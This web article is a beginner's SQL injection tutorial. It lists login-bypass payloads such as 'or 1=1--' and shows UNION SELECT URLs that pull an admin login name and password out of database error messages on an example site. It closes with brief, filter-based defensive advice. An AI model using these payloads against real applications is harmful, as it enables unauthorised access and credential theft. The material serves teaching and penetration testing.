sql injection
sql injection

The following article will try to help beginners with SQL Injection techniques, to successfully utilize them, and to protect themselves from such attacks.

  1. Introduction

SQL injection is one of the type of web hacking that requires nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS. we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the “9.0 Where can I get more info?” for people who truly deserve credit for developing many techniques in SQL injection.

2. What is SQL Injection?

It is a way to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from the web user and make SQL query to the database. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

3. What should you look for?

Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for “FORM” tag in the HTML code. You may find something like this in some HTML codes:

<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

Everything between the <FORM> and </FORM> has potential parameters that might be useful.

4. What if you can’t find any page that takes input?

You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:

http://xyz.com/index.asp?id=10

5. How do you test if it is vulnerable?

Start with a single quote trick. Input something like:

hi’ or 1=1–

Into login, or password, or even in the URL. Example:
– Login: hi’ or 1=1–
 – Pass: hi’ or 1=1–
 – http://xyz.com/index.asp?id=hi’ or 1=1–

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:

<FORM action=http://xyz.com/Search/search.asp method=post>
<input type=hidden name=A value=”hi’ or 1=1–“>
</FORM>

If luck is on your side, you will get login without any login name or password. Depending on the actual SQL query, you may have to try some of these possibilities:

‘ or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’=’a
” or “a”=”a
‘) or (‘a’=’a

6. How to retrieve any data we want?

Now that we have identified some important tables and their column, we can use the same technique to gather any information we want from the database.Now, let’s get the first login_name from the “admin_login” table.

http://xyz.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login

Output:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘neo’ to a column of data type int.
/index.asp, line 5

http://xyz.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’–

Output:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘m4trix’ to a column of data type int.
/index.asp, line 5

We can now log in as “neo” with his password “m4trix”.

7. How to avoid SQL Injection?

Filter out a character like single quote, double quote, slash, back slash, semi colon, an extended character like NULL, carry return, new line, etc, in all strings from:

  • Input from users
  • Parameters from URL
  • Values from cookie

For a numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer. Change “Startup and run SQL Server” using low privilege user in SQL Server Security tab. Delete stored procedures that you are not using.

LEAVE A REPLY

Please enter your comment!
Please enter your name here